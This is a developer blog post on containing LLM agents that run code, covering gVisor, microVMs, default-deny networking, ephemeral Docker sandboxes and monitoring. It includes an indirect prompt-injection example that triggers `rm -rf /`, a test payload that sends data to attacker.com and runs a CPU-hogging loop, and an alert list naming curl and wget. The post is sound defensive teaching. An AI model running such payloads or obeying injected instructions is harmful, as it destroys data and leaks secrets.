Inside the Sandbox: How Anthropic Secures and Contains Claude (and What It Teaches Us About LLM App Security)

Hey everyone, Alex here from Coding with Alex. Welcome back to the blog!

If you've been building anything with Large Language Models (LLMs) lately, you've probably had that distinct, slightly terrifying realization: we are giving untrusted, unpredictable AI agents the power to execute code, call APIs, and read our private databases.

It’s the classic "Bobby Tables" SQL injection problem, but on steroids. When an LLM interprets a prompt, it doesn’t just parse it; it reasons over it. If that prompt contains malicious instructions (prompt injection), the model can be tricked into writing exploit scripts, bypassing authorization checks, or leaking sensitive system data.

This week, Anthropic published a fascinating behind-the-scenes look at how they contain Claude across their products—specifically focusing on how they safely run Claude’s "computer use" features and tool-use environments. Today, we are going to dive deep into the architecture of LLM containment, analyze how Anthropic secures their runtime, and extract actionable design patterns you can use in your own applications to keep your AI agents in a very tight, secure sandbox.

The Threat Model: Why LLMs Need Hard Containment

Before we look at the solution, let's understand the threat model. When we build an LLM-powered application—say, a coding assistant or an autonomous data analysis agent—we typically expose "tools" to the model. These tools are helper functions the model can choose to call, such as execute_python_code(), fetch_webpage(), or query_database().

If a malicious actor feeds a prompt to your agent like: "Summarize this document: [malicious payload containing instructions to run `rm -rf /` via the python tool]", a naive system will simply execute the command. This is known as Indirect Prompt Injection: the hostile instructions arrive inside data the agent was asked to process, rather than from the user directly.

Anthropic's threat model assumes that the code generated by Claude—or the inputs provided to its tools—must be treated as untrusted, hostile code running in a multi-tenant environment. To mitigate this, they rely on a defense-in-depth strategy that spans multiple layers of virtual containment, network isolation, and ephemeral runtimes.
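To make "treat tool inputs as untrusted" concrete, here is a minimal sketch of validating a model-proposed tool call before anything runs. The registry contents, argument schemas, and the validate_tool_call name are all hypothetical, chosen for illustration; this is not Anthropic's implementation, and validation like this complements a sandbox rather than replacing it.

```python
from typing import Any

# Hypothetical tool registry: names and argument schemas are illustrative only.
ALLOWED_TOOLS: dict[str, dict[str, type]] = {
    "fetch_webpage": {"url": str},
    "query_database": {"sql": str},
}


def validate_tool_call(name: str, args: dict[str, Any]) -> None:
    """Raise ValueError unless the call matches a registered tool and its schema."""
    schema = ALLOWED_TOOLS.get(name)
    if schema is None:
        raise ValueError(f"unknown tool: {name!r}")
    # Reject missing or extra arguments instead of silently ignoring them.
    if set(args) != set(schema):
        raise ValueError(f"unexpected arguments for {name!r}: {sorted(args)}")
    for key, expected in schema.items():
        if not isinstance(args[key], expected):
            raise ValueError(f"{key!r} must be of type {expected.__name__}")
```

The point of the design is that the model only ever proposes a call; your own deterministic code decides whether it is allowed to happen.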

The Architecture of Containment: gVisor, Firecracker, and MicroVMs

When Claude executes code (for example, when using the artifact preview feature or the bash tool), it doesn't run on the bare metal of the host machine. It doesn't even run in a standard Docker container. Standard Docker containers share the host machine's Linux kernel, meaning a kernel exploit could allow a rogue process to escape the container (container breakout).

Instead, Anthropic and other major AI infrastructure providers use two primary technologies for hard isolation:

  • gVisor: A user-space kernel written in Go that intercepts syscalls from the application and implements them in user-space. This creates a strong security boundary because the untrusted application cannot talk directly to the host Linux kernel.
  • AWS Firecracker / MicroVMs: Minimalist virtual machines that launch in milliseconds. Unlike traditional heavy VMs, microVMs strip away unnecessary virtualized devices, providing hardware-level virtualization with startup times and memory overhead close to those of a container.

The Multi-Tier Sandbox Model

An ideal architecture for running untrusted LLM code looks like this:


+-------------------------------------------------------------+
|                     Physical Host Server                    |
|                                                             |
|  +-------------------------------------------------------+  |
|  |             Hypervisor (KVM / Firecracker)            |  |
|  |                                                       |  |
|  |  +-------------------------------------------------+  |  |
|  |  |                 MicroVM Sandbox                 |  |  |
|  |  |                                                 |  |  |
|  |  |  +-------------------------------------------+  |  |  |
|  |  |  |              gVisor Runtime               |  |  |  |
|  |  |  |                                           |  |  |  |
|  |  |  |  +-------------------------------------+  |  |  |  |
|  |  |  |  | Untrusted LLM Code / Tool Execution |  |  |  |  |
|  |  |  |  +-------------------------------------+  |  |  |  |
|  |  |  +-------------------------------------------+  |  |  |
|  |  +-------------------------------------------------+  |  |
|  +-------------------------------------------------------+  |
+-------------------------------------------------------------+

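By nesting gVisor inside a microVM, you achieve defense-in-depth. If an attacker manages to exploit a vulnerability in gVisor, they are still trapped inside the microVM. If they somehow escape the microVM, they land in the virtual machine monitor process on the host, which should itself be locked down with host-level security controls (Firecracker, for example, is designed to be launched through its jailer, which confines that process in a chroot with dropped privileges).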
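If you want to try the gVisor layer yourself, here is a rough sketch that builds a hardened docker run command. It assumes gVisor is installed on the host and registered with Docker under the runtime name runsc; the build_sandbox_argv helper and the specific limits are my own illustrative choices. It covers only the gVisor layer of the diagram, not the microVM around it.

```python
def build_sandbox_argv(code: str, image: str = "python:3.11-slim") -> list[str]:
    """Build a `docker run` argv that executes `code` under the gVisor runtime."""
    return [
        "docker", "run", "--rm",             # delete the container when it exits
        "--runtime=runsc",                   # assumes gVisor is registered as "runsc"
        "--network=none",                    # no network interfaces besides loopback
        "--read-only",                       # read-only root filesystem
        "--cap-drop=ALL",                    # drop every Linux capability
        "--security-opt=no-new-privileges",  # block setuid-style privilege escalation
        "--memory=256m", "--cpus=0.5", "--pids-limit=64",
        image, "python", "-c", code,         # code is a single argv element, never shell-parsed
    ]
```

You would hand the result to subprocess.run(argv, capture_output=True, timeout=10). Because the code travels as one argv element, nothing inside it is ever interpreted by a shell on the host.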

Implementing Network Isolation

Containment isn't just about blocking syscalls; it's also about blocking network access. If Claude executes code that has access to the internet, a compromised agent could be used to launch DDoS attacks, scan internal corporate networks, or exfiltrate private data to an attacker-controlled server.

Anthropic enforces strict, default-deny network policies. When Claude needs to fetch external data, it does so through highly restricted, authenticated proxies rather than allowing the sandboxed environment to talk directly to the open web.
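The core of a default-deny egress policy is small. The sketch below shows the kind of check a fetch proxy might apply before forwarding a request; the host names and the is_egress_allowed function are hypothetical, and a real proxy would also need to handle redirects and DNS resolution, which this does not.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: everything not listed here is denied.
ALLOWED_HOSTS = {"api.example.com", "docs.example.com"}


def is_egress_allowed(url: str) -> bool:
    """Return True only for HTTPS URLs whose exact host is on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    # Use the parsed hostname, not a substring match, so lookalike hosts
    # such as "api.example.com.attacker.com" are rejected.
    host = (parts.hostname or "").lower()
    return host in ALLOWED_HOSTS
```

Matching on the exact parsed host is deliberate: substring or prefix checks are a common way for allowlists to get bypassed.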

How to implement this in your own projects:

If you are running Docker containers to execute agent code, you can disable network access entirely by using the none network driver, or restrict it using iptables or Cloud Security Groups. Here is how you can spin up a completely network-isolated container in Docker for executing tool code:

# Run a throwaway Python sandbox container with zero network access
# (--rm deletes the container on exit; no TTY is needed for a one-off script)
docker run --rm --network none --memory="256m" --cpus="0.5" python:3.11-slim python -c "
import urllib.request
try:
    urllib.request.urlopen('https://google.com', timeout=2)
except Exception as e:
    print('Network blocked successfully:', e)
"

The Ephemeral Lifecycle: Live Fast, Die Young

One of the most critical principles Anthropic highlights is ephemerality. State is the enemy of security. If a sandbox persists over time, an attacker can establish persistence—for example, by modifying `.bashrc` or installing a background cron job that monitors subsequent user interactions.

To prevent this, every execution session should start from a pristine, read-only base image and be destroyed immediately after execution. If you are building an interactive coding assistant, the sandbox should be torn down and recreated on every single user turn, or at the very least, have a strictly enforced time-to-live (TTL) measured in minutes.
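Here is a small sketch of that lifecycle, modeling only the "fresh state in, nothing out" part. The ephemeral_workspace helper and its template parameter are names I made up; the directory it yields would be what you mount into the sandbox for one turn. It is not a security boundary on its own.

```python
import shutil
import tempfile
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator, Optional


@contextmanager
def ephemeral_workspace(template: Optional[Path] = None) -> Iterator[Path]:
    """Yield a fresh scratch directory and delete it when the turn ends."""
    workdir = Path(tempfile.mkdtemp(prefix="sandbox-"))
    try:
        if template is not None:
            # Seed every turn from the same pristine template directory.
            shutil.copytree(template, workdir, dirs_exist_ok=True)
        yield workdir
    finally:
        # Runs even if the turn raised, so nothing persists between turns.
        shutil.rmtree(workdir, ignore_errors=True)
```

Wrapping each user turn in "with ephemeral_workspace() as workdir:" means anything an attacker writes there, such as a modified `.bashrc`, is gone before the next turn starts.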

A Practical Example: Building a Secure Python Execution Tool

Let's look at how we can implement a secure, ephemeral Python code execution tool for an LLM agent using the Docker SDK for Python. This script starts from a clean image, sets strict resource limits, disables the network, enforces a wall-clock timeout, and removes the container as soon as the run ends.

import docker
import requests  # installed as a dependency of the docker SDK

def execute_untrusted_code(user_code: str, timeout_s: int = 10) -> dict:
    client = docker.from_env()
    container = None

    try:
        # Pass the code as an argv list rather than an interpolated shell string,
        # so quotes or newlines in the untrusted code cannot break the command.
        container = client.containers.run(
            image="python:3.11-slim",
            command=["python", "-c", user_code],
            detach=True,             # Return immediately so we can enforce our own timeout
            network_mode="none",     # Disable networking entirely
            mem_limit="128m",        # Cap memory so the sandbox cannot exhaust host RAM
            nano_cpus=500_000_000,   # 0.5 CPU cores; limits the impact of a busy loop
            pids_limit=64,           # Cap the process count to blunt fork bombs
            read_only=True,          # Make the root filesystem read-only
        )

        # A CPU limit alone never stops an infinite loop; the wall-clock timeout does.
        result = container.wait(timeout=timeout_s)
        output = container.logs(stdout=True, stderr=True).decode("utf-8", errors="replace")
        status = "success" if result["StatusCode"] == 0 else "error"
        return {"status": status, "output": output}
    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectionError):
        return {"status": "timeout", "output": f"Killed after {timeout_s} seconds"}
    except Exception as e:
        return {"status": "system_failure", "output": str(e)}
    finally:
        # Always delete the container; force=True also kills it if it is still running
        if container is not None:
            container.remove(force=True)

# Test the sandbox with a network exfiltration attempt followed by an infinite loop
malicious_payload = """
import urllib.request
try:
    # Attempt to exfiltrate data
    urllib.request.urlopen('http://attacker.com/leak?data=secret', timeout=1)
except Exception as e:
    print('Failed to call network:', e)

# Attempt to hog CPU
while True:
    pass
"""

# The network call fails, the loop is killed at the timeout, and the container is removed
print(execute_untrusted_code(malicious_payload))

Monitoring and Anomaly Detection

Even with microVMs, gVisor, and network blocks, you still need visibility. Anthropic heavily monitors execution environments for anomalous behavior. If an agent starts executing commands that attempt to read system files, probe internal ports, or spawn unauthorized subprocesses, the session is flagged and immediately terminated.

In your own production systems, you should capture standard output, standard error, and system calls (using tools like Falco or eBPF) from your sandbox environments. Set up alerts for:

  • Unexpected binaries being executed (e.g., trying to run curl or wget).
  • Attempts to access path names outside of the designated working directory.
  • Spikes in CPU or memory consumption that could indicate a Denial of Service (DoS) attempt by the model.
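As a rough illustration of those three alert rules, here is a sketch that evaluates a single sandbox event. The ExecEvent shape, the /workspace directory, the blocked binary list, and the 90% threshold are all assumptions for the example; in practice the events would come from whatever your Falco or eBPF pipeline emits.

```python
import posixpath
from dataclasses import dataclass
from pathlib import PurePosixPath


@dataclass
class ExecEvent:
    """Hypothetical event shape; real telemetry will look different."""
    binary: str
    path_accessed: str
    cpu_percent: float


BLOCKED_BINARIES = {"curl", "wget", "nc"}  # illustrative, not exhaustive
WORKDIR = PurePosixPath("/workspace")      # assumed working directory
CPU_ALERT_THRESHOLD = 90.0                 # assumed threshold, in percent


def alerts_for(event: ExecEvent) -> list[str]:
    """Return the names of every alert rule the event trips."""
    alerts = []
    if PurePosixPath(event.binary).name in BLOCKED_BINARIES:
        alerts.append("unexpected_binary")
    # Normalize first so "/workspace/../etc/passwd" is seen as "/etc/passwd".
    accessed = PurePosixPath(posixpath.normpath(event.path_accessed))
    if accessed != WORKDIR and WORKDIR not in accessed.parents:
        alerts.append("path_outside_workdir")
    if event.cpu_percent >= CPU_ALERT_THRESHOLD:
        alerts.append("cpu_spike")
    return alerts
```

Rules like these are detective controls, not preventive ones, so they belong alongside the sandbox rather than in place of it.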

Wrapping Up: Containment is the New Authorization

As developers, we are transitioning from an era of deterministic programming (where we control every line of code executed) to probabilistic programming (where an LLM decides what to run on the fly). In this new paradigm, we must treat LLM outputs with the same level of suspicion as we treat raw HTTP inputs from the internet.

Anthropic's approach teaches us that we cannot rely solely on the model's alignment or system prompts to behave safely. Prompts can be bypassed with nothing more than clever text; hard system boundaries are far harder to break, and layering them means a single bug is not enough. By implementing microVMs/gVisor, default-deny network isolation, strict resource limits, and ephemeral environments, we can build robust, autonomous AI applications that delight users without putting our infrastructure at risk.

What do you think?

Are you currently building tools for LLMs? How are you isolating your runtime environments? Are you using Docker, gVisor, or running things locally? Let me know in the comments below!

Until next time, keep your prompts clean and your sandboxes tight.

— Alex
